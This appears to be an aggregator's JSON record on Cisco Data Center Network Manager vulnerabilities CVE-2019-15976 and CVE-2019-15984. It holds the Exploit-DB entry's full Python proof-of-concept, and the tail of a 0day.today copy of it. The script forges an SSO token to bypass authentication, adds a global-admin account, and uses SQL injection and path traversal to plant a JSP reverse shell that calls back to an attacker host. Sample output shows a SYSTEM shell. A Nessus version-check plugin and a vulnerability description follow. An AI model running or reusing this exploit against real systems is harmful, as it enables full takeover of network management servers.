\"../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp\" % vfs\r\n sql = \"update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';\" % (sp, sc)\r\n if we_can_trigger_sql_injection(t, sql):\r\n print \"(+) SQL Injection working!\"\r\n\r\n # stage 5 - trigger the shell write\r\n if we_can_trigger_second_order_write(t, sp):\r\n print \"(+) wrote the si.jsp shell!\"\r\n\r\n # stage 6 - cleanup\r\n sql = \"delete from xmldocs where user_name='1337';\"\r\n if we_can_trigger_sql_injection(t, sql):\r\n print \"(+) cleaned up the database!\"\r\n\r\n # stage 7 - go get some rce\r\n exec_code(t, usr, pwd, cbp)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\n\n# 0day.today [2020-02-06] #", "sourceHref": "https://0day.today/exploit/33920", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-16T06:07:48", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-06T00:00:00", "type": "exploitdb", "title": "Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-15976", "2019-15984", "CVE-2019-15976", "CVE-2019-15984"], "modified": "2020-02-06T00:00:00", "id": "EDB-ID:48019", "href": "https://www.exploit-db.com/exploits/48019", "sourceData": "#!/usr/bin/python\r\n\"\"\"\r\nCisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability\r\n\r\nTested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)\r\n- Release: 11.2(1)\r\n- Release Date: 18-Jun-2019\r\n- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip\r\n- Size: 1619.36 MB (1698022100 bytes)\r\n- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5 \r\n\r\nBug 1: CVE-2019-15976 / ZDI-20-008\r\nBug 2: CVE-2019-15984 / ZDI-20-060\r\n\r\nExample:\r\n========\r\n\r\nsaturn:~ mr_me$ ./poc.py \r\n(+) usage: ./poc.py <target> <connectback>\r\n(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337\r\n\r\nsaturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337\r\n(+) created the account hacker:Hacked123\r\n(+) created the 1337/custom path!\r\n(+) leaked vfs! temp230cf31722794196/content-ed98b5003b1c695c\r\n(+) SQL Injection working!\r\n(+) wrote the si.jsp shell!\r\n(+) cleaned up the database!\r\n(+) starting handler on port 1337\r\n(+) connection from 192.168.100.122\r\n(+) pop thy shell!\r\nMicrosoft Windows [Version 6.3.9600]\r\n(c) 2013 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files\\Cisco Systems\\dcm\\wildfly-10.1.0.Final\\bin\\service>whoami\r\nwhoami\r\nnt authority\\system\r\n\r\nC:\\Program Files\\Cisco Systems\\dcm\\wildfly-10.1.0.Final\\bin\\service>\r\n\r\nClean Up:\r\n=========\r\n\r\n1. delete from xmlDocs where user_name = '1337';\r\n2. delete si.jsp from the web root\r\n3. delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337\r\n\"\"\"\r\n\r\nimport re\r\nimport md5\r\nimport sys\r\nimport time\r\nimport socket\r\nimport base64\r\nimport requests\r\nimport telnetlib\r\nfrom threading import Thread\r\nfrom xml.etree import ElementTree\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\ndef _get_jsp(cbh, cbp):\r\n \"\"\" get me some jsp for a connectback! \"\"\"\r\n jsp = \"\"\"\r\n <%%@page import=\"java.lang.*\"%%>\r\n <%%@page import=\"java.util.*\"%%>\r\n <%%@page import=\"java.io.*\"%%>\r\n <%%@page import=\"java.net.*\"%%>\r\n\r\n <%%\r\n // clean up\r\n String[] files = {\r\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml\", \r\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/\",\r\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/\",\r\n };\r\n for (String s:files){ File f = new File(s); f.delete(); }\r\n File f = new File(application.getRealPath(\"/\" + this.getClass().getSimpleName().replaceFirst(\"_\",\".\")));\r\n f.delete();\r\n class StreamConnector extends Thread\r\n {\r\n InputStream we;\r\n OutputStream uo;\r\n\r\n StreamConnector( InputStream we, OutputStream uo )\r\n {\r\n this.we = we;\r\n this.uo = uo;\r\n }\r\n\r\n public void run()\r\n {\r\n BufferedReader dy = null;\r\n BufferedWriter zvi = null;\r\n try\r\n {\r\n dy = new BufferedReader( new InputStreamReader( this.we ) );\r\n zvi = new BufferedWriter( new OutputStreamWriter( this.uo ) );\r\n char buffer[] = new char[8192];\r\n int length;\r\n while( ( length = dy.read( buffer, 0, buffer.length ) ) > 0 )\r\n {\r\n zvi.write( buffer, 0, length );\r\n zvi.flush();\r\n }\r\n } catch( Exception e ){}\r\n try\r\n {\r\n if( dy != null )\r\n dy.close();\r\n if( zvi != null )\r\n zvi.close();\r\n } catch( Exception e ){}\r\n }\r\n }\r\n\r\n try\r\n {\r\n String ShellPath;\r\n ShellPath = new String(\"cmd.exe\");\r\n Socket socket = new Socket( \"%s\", %s);\r\n Process process = Runtime.getRuntime().exec( ShellPath );\r\n ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();\r\n ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();\r\n } catch( Exception e ) {}\r\n %%>\r\n \"\"\" % (cbh, cbp)\r\n return jsp\r\n\r\ndef get_session(target, user, password):\r\n \"\"\" we have bypassed auth at this point and created an admin \"\"\"\r\n d = {\r\n \"j_username\" : user,\r\n \"j_password\" : password\r\n }\r\n uri = \"https://%s/j_spring_security_check\" % target\r\n r = requests.post(uri, data=d, verify=False, allow_redirects=False)\r\n if \"Set-Cookie\" in r.headers:\r\n match = re.search(r\"JSESSIONID=(.{56}).*resttoken=(\\d{1,4}:.{44});\", r.headers[\"Set-Cookie\"])\r\n if match:\r\n sessionid = match.group(1)\r\n resttoken = match.group(2)\r\n return { \"JSESSIONID\" : sessionid, \"resttoken\": resttoken}\r\n return False\r\n\r\ndef craft_soap_header():\r\n soap_header = '\\t<SOAP-ENV:Header xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">'\r\n soap_header += '<m:ssoToken xmlns:m=\"http://ep.jaxws.dcbu.cisco.com/\">%s</m:ssoToken>' % gen_ssotoken()\r\n soap_header += '\\t</SOAP-ENV:Header>'\r\n return soap_header\r\n\r\ndef we_can_trigger_folder_path_creation(target):\r\n \"\"\" craft the path location and db entry for the traversal \"\"\"\r\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n soap_body += '\\t\\t<ep:saveReportTemplate>'\r\n soap_body += '\\t\\t\\t<reportTemplateName>si</reportTemplateName>'\r\n soap_body += '\\t\\t\\t<userName>1337</userName>'\r\n soap_body += '\\t\\t\\t<updatedAttrs></updatedAttrs>'\r\n soap_body += '\\t\\t\\t<pmInterval>1337</pmInterval>'\r\n soap_body += '\\t\\t</ep:saveReportTemplate>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/ReportWSService/ReportWS\" % target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n if r.status_code == 200:\r\n return True\r\n return False\r\n\r\ndef we_can_trigger_second_order_write(target, shellpath):\r\n \"\"\" trigger the traversal \"\"\"\r\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n soap_body += '\\t\\t<ep:openReportTemplate>'\r\n soap_body += '\\t\\t\\t<reportTemplateName>%s</reportTemplateName>' % shellpath\r\n soap_body += '\\t\\t\\t<userName>1337</userName>'\r\n soap_body += '\\t\\t</ep:openReportTemplate>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/ReportWSService/ReportWS\" % target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n if r.status_code == 200:\r\n return True\r\n return False\r\n\r\ndef gen_ssotoken():\r\n \"\"\" auth bypass \"\"\"\r\n timestamp = 9999999999999 # we live forever\r\n username = \"hax\" # doesnt even need to exist!\r\n sessionid = 1337 # doesnt even need to exist!\r\n d = \"%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF\" % (username, sessionid, timestamp)\r\n return \"%d.%d.%s.%s\" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username)\r\n\r\ndef we_can_trigger_sql_injection(target, sql):\r\n \"\"\" stacked sqli primitive \"\"\"\r\n sqli = \";%s--\" % sql\r\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n soap_body += '\\t\\t<ep:getVmHostData>'\r\n soap_body += '\\t\\t\\t<arg0>'\r\n soap_body += '\\t\\t\\t\\t<sortField>vcluster</sortField>'\r\n soap_body += '\\t\\t\\t\\t<sortType>%s</sortType>' % sqli\r\n soap_body += '\\t\\t\\t</arg0>'\r\n soap_body += '\\t\\t\\t<arg1></arg1>'\r\n soap_body += '\\t\\t\\t<arg2></arg2>'\r\n soap_body += '\\t\\t\\t<arg3>false</arg3>'\r\n soap_body += '\\t\\t</ep:getVmHostData>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/DbInventoryWSService/DbInventoryWS\" % target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n if r.status_code == 200:\r\n return True\r\n return False\r\n\r\ndef we_can_leak_vfs(target):\r\n \"\"\" we use a information disclosure for the vfs path \"\"\"\r\n global vfs\r\n uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target\r\n c = requests.auth.HTTPBasicAuth('admin', 'nbv_12345')\r\n r = requests.get(uri, verify=False, auth=c)\r\n match = re.search(r\"temp\\\\(.{21}content-.{15,16})\", r.text)\r\n if match:\r\n vfs = str(match.group(1).replace(\"\\\\\",\"/\"))\r\n return True\r\n return False\r\n\r\ndef handler(lp):\r\n \"\"\" this is the client handler, to catch the connectback \"\"\"\r\n print \"(+) starting handler on port %d\" % lp\r\n t = telnetlib.Telnet()\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((\"0.0.0.0\", lp))\r\n s.listen(1)\r\n conn, addr = s.accept()\r\n print \"(+) connection from %s\" % addr[0]\r\n t.sock = conn\r\n print \"(+) pop thy shell!\"\r\n t.interact()\r\n\r\ndef exec_code(t, usr, pwd, cbp):\r\n \"\"\" this function threads the client handler and sends off the attacking payload \"\"\"\r\n handlerthr = Thread(target=handler, args=(int(cbp),))\r\n handlerthr.start()\r\n r = requests.get(\"https://%s/si.jsp\" % t, cookies=get_session(t, usr, pwd), verify=False)\r\n\r\ndef we_can_add_user(target, usr, pwd):\r\n \"\"\" add a user so that we can reach our backdoor! \"\"\"\r\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n soap_body += '\\t\\t<ep:addUser>'\r\n soap_body += '\\t\\t\\t<userName>%s</userName>' % usr\r\n soap_body += '\\t\\t\\t<password>%s</password>' % pwd\r\n soap_body += '\\t\\t\\t<roleName>global-admin</roleName>'\r\n soap_body += '\\t\\t\\t<enablePwdExpiration>false</enablePwdExpiration>'\r\n soap_body += '\\t\\t</ep:addUser>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/DbAdminWSService/DbAdminWS\" % target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n tree = ElementTree.fromstring(r.content)\r\n for elem in tree.iter():\r\n if elem.tag == \"resultMessage\":\r\n res = elem.text\r\n if res == \"Success\":\r\n return True\r\n elif res == \"User already exists.\":\r\n return True\r\n return False\r\n\r\ndef main():\r\n\r\n usr = \"hacker\"\r\n pwd = \"Hacked123\"\r\n\r\n if len(sys.argv) != 3:\r\n print \"(+) usage: %s <target> <connectback>\" % sys.argv[0]\r\n print \"(+) eg: %s 192.168.100.122 192.168.100.59:1337\" % sys.argv[0]\r\n sys.exit(1)\r\n\r\n t = sys.argv[1]\r\n c = sys.argv[2]\r\n\r\n cbh = c.split(\":\")[0]\r\n cbp = c.split(\":\")[1]\r\n sc = _get_jsp(cbh, cbp).encode(\"hex\")\r\n\r\n # stage 1 - add a user\r\n if we_can_add_user(t, usr, pwd):\r\n print \"(+) created the account %s:%s\" % (usr, pwd)\r\n\r\n # stage 2 - trigger folder creation and db entry\r\n if we_can_trigger_folder_path_creation(t):\r\n print \"(+) created the 1337/custom path!\"\r\n\r\n # stage 3 - leak the vfs path (not really required I suppose)\r\n if we_can_leak_vfs(t):\r\n print \"(+) leaked vfs! %s\" % vfs\r\n\r\n # stage 4 - trigger the sql injection to update our template entry\r\n sp = \"../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp\" % vfs\r\n sql = \"update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';\" % (sp, sc)\r\n if we_can_trigger_sql_injection(t, sql):\r\n print \"(+) SQL Injection working!\"\r\n\r\n # stage 5 - trigger the shell write\r\n if we_can_trigger_second_order_write(t, sp):\r\n print \"(+) wrote the si.jsp shell!\"\r\n\r\n # stage 6 - cleanup\r\n sql = \"delete from xmldocs where user_name='1337';\"\r\n if we_can_trigger_sql_injection(t, sql):\r\n print \"(+) cleaned up the database!\"\r\n\r\n # stage 7 - go get some rce\r\n exec_code(t, usr, pwd, cbp)\r\n\r\nif __name__ == \"__main__\":\r\n main()", "sourceHref": "https://www.exploit-db.com/download/48019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T15:05:17", "description": "According to its self-reported version number, the instance of Cisco DCNM hosted on the remote server is prior to 11.3(1). It is, therefore, affected by multiple vulnerabilities:\n\n - An authentication bypass vulnerability exists in the REST API, SOAP API, and the web-based management interface due to a static encryption key being shared between installations. An unauthenticated, remote attacker can exploit this, via the REST API, SOAP API, or web-based management interface, to bypass authentication and execute arbitrary actions with administrative privileges. (CVE-2019-15975, CVE-2019-15976, CVE-2019-15977)\n\n - A command injection vulnerability exists in the REST API and SOAP API due to insufficient validation of user-supplied input. An authenticated, remote attacker can exploit this, via the APIs, to execute arbitrary commands. (CVE-2019-15978, CVE-2019-15979)\n\n - A path traversal vulnerability exists in the REST API and SOAP API due to insufficient validation of user-supplied input. An authenticated, remote attacker can exploit this, via the APIs, to read, write, or execute arbitrary files on the system. (CVE-2019-15980, CVE-2019-15981, CVE-2019-15982)\n\n - An XML external entity (XXE) vulnerability exists due to an incorrectly configured XML parser accepting XML external entities from an untrusted source. An authenticated, remote attacker can exploit this, via specially crafted XML data in the SOAP API, to disclose sensitive information. (CVE-2019-15983)\n\n - A SQL injection (SQLi) vulnerability exists in the SOAP API and REST API due to improper validation of user-supplied input. An authenticated, remote attacker can exploit this to inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data.\n (CVE-2019-15984, CVE-2019-15985, CVE-2019-15986)\n\n - A vulnerability exists in the authentication settings of the JBOSS EAP due to an incorrect configuration.\n An authenticated, remote attacker can exploit this by authentication with a specific low-privilege account, to gain unauthorized access to the JBOSS EAP. (CVE-2019-15999)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-09T00:00:00", "type": "nessus", "title": "Cisco Data Center Network Manager < 11.3(1) Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15975", "CVE-2019-15976", "CVE-2019-15977", "CVE-2019-15978", "CVE-2019-15979", "CVE-2019-15980", "CVE-2019-15981", "CVE-2019-15982", "CVE-2019-15983", "CVE-2019-15984", "CVE-2019-15985", "CVE-2019-15986", "CVE-2019-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:cisco:data_center_network_manager"], "id": "CISCO-SA-20200102-DCNM.NASL", "href": "https://www.tenable.com/plugins/nessus/132721", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132721);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2019-15975\",\n \"CVE-2019-15976\",\n \"CVE-2019-15977\",\n \"CVE-2019-15978\",\n \"CVE-2019-15979\",\n \"CVE-2019-15980\",\n \"CVE-2019-15981\",\n \"CVE-2019-15982\",\n \"CVE-2019-15983\",\n \"CVE-2019-15984\",\n \"CVE-2019-15985\",\n \"CVE-2019-15999\"\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq85945\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq85957\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq85972\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq85998\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq89422\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq89834\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq89841\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq89859\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq89878\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq89895\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq89898\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq98723\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq98730\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq98736\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq98748\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr01692\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr01694\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr01701\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr05463\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr07317\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr14598\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr17970\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr17974\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr23573\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr23728\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr23733\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr23770\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr23864\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr23865\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr32014\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr34624\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr44798\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr44896\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr46507\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr46508\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr46544\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr46547\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr79116\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr79127\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr79188\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr79240\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr88730\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr88737\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvs00139\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvs16306\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvs16318\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvs16341\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvs16350\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20200102-dcnm-auth-bypass\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20200102-dcnm-sql-inject\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20200102-dcnm-path-trav\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20200102-dcnm-comm-inject\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20200102-dcnm-xml-ext-entity\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20200102-dcnm-unauth-access\");\n script_xref(name:\"IAVA\", value:\"2020-A-0009-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0003\");\n\n script_name(english:\"Cisco Data Center Network Manager < 11.3(1) Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of Cisco DCNM hosted on the remote server is prior\nto 11.3(1). It is, therefore, affected by multiple vulnerabilities:\n\n - An authentication bypass vulnerability exists in the REST API, SOAP API, and the web-based management\n interface due to a static encryption key being shared between installations. An unauthenticated, remote\n attacker can exploit this, via the REST API, SOAP API, or web-based management interface, to bypass\n authentication and execute arbitrary actions with administrative privileges. (CVE-2019-15975,\n CVE-2019-15976, CVE-2019-15977)\n\n - A command injection vulnerability exists in the REST API and SOAP API due to insufficient validation of\n user-supplied input. An authenticated, remote attacker can exploit this, via the APIs, to execute\n arbitrary commands. (CVE-2019-15978, CVE-2019-15979)\n\n - A path traversal vulnerability exists in the REST API and SOAP API due to insufficient validation of\n user-supplied input. An authenticated, remote attacker can exploit this, via the APIs, to read, write, or\n execute arbitrary files on the system. (CVE-2019-15980, CVE-2019-15981, CVE-2019-15982)\n\n - An XML external entity (XXE) vulnerability exists due to an incorrectly configured XML parser accepting\n XML external entities from an untrusted source. An authenticated, remote attacker can exploit this, via\n specially crafted XML data in the SOAP API, to disclose sensitive information. (CVE-2019-15983)\n\n - A SQL injection (SQLi) vulnerability exists in the SOAP API and REST API due to improper validation of\n user-supplied input. An authenticated, remote attacker can exploit this to inject or manipulate SQL\n queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data.\n (CVE-2019-15984, CVE-2019-15985, CVE-2019-15986)\n\n - A vulnerability exists in the authentication settings of the JBOSS EAP due to an incorrect configuration.\n An authenticated, remote attacker can exploit this by authentication with a specific low-privilege\n account, to gain unauthorized access to the JBOSS EAP. (CVE-2019-15999)\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7295287f\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c3a5bc15\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-path-trav\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bc0e4dd2\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-comm-inject\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c51ba034\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-xml-ext-entity\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?631a2bce\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-unauth-access\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cd86400d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Cisco Data Center Network Manager version 11.3(1) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-15976\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(22, 78, 89, 284, 611, 798);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:data_center_network_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_prime_dcnm_installed_win.nasl\", \"cisco_prime_dcnm_installed_linux.nasl\", \"cisco_prime_dcnm_web_detect.nasl\");\n script_require_ports(\"installed_sw/Cisco Prime DCNM\", \"installed_sw/cisco_dcnm_web\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::cisco_dcnm_web::get_app_info();\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'fixed_version' : '11.3.1.0', 'fixed_display' : '11.3(1)' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE, sqli:TRUE});\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Cisco Data Center Network Manager getSanSwitchBandwidthStatList SQL Injection Remote Code Execution Vulnerability

Description

Related